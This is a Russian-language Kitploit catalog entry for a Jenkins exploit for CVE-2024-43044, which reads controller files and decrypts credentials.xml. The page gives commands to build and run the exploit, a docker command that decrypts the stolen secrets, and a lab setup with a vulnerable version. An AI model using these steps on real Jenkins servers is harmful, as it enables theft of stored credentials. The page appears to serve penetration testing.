Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-43044-jenkins-creds — Эксплойт для CVE-2024-43044, позволяющий произвольное чтение файлов с контроллера Jenkins для извлечения и дешифровки credentials.xml с использованием секретных ключей. | Kitploit
Инструменты/GitHubGitHub/dacc4/cve-2024-43044-jenkins-creds
Инструменты шифрования/дешифрованияАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubdacc4/cve-2024-43044-jenkins-creds

CVE-2024-43044-jenkins-creds

Эксплойт для CVE-2024-43044, позволяющий произвольное чтение файлов с контроллера Jenkins для извлечения и дешифровки credentials.xml с использованием секретных ключей.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
41 год назадЕщё не проверено

Введение

Это эксплойт для CVE-2024-43044 — произвольного чтения файлов, позволяющего агенту получать файлы с контроллера.

Эксплойт использует уязвимость для чтения файла credentials.xml и получения секретных ключей для его расшифровки.

Исходный код: https://github.com/convisolabs/CVE-2024-43044-jenkins Оригинальная статья: https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/

Сборка эксплойта

root@kitploit:~
mvn package

Запуск эксплойта

root@kitploit:~
java -jar exploit.jar mode_secret <jenkinsUrl> <nodeName> <nodeSecretKey>

Расшифровка credentials.xml

root@kitploit:~
docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \
  docker.io/hoto/jenkins-credentials-decryptor:latest \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json

Тестирование

Вы можете протестировать его на уязвимой версии с помощью Docker:

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 --restart=on-failure jenkins/jenkins:2.441-jdk17

После того как Jenkins запущен, настройте агента.

Скачать инструмент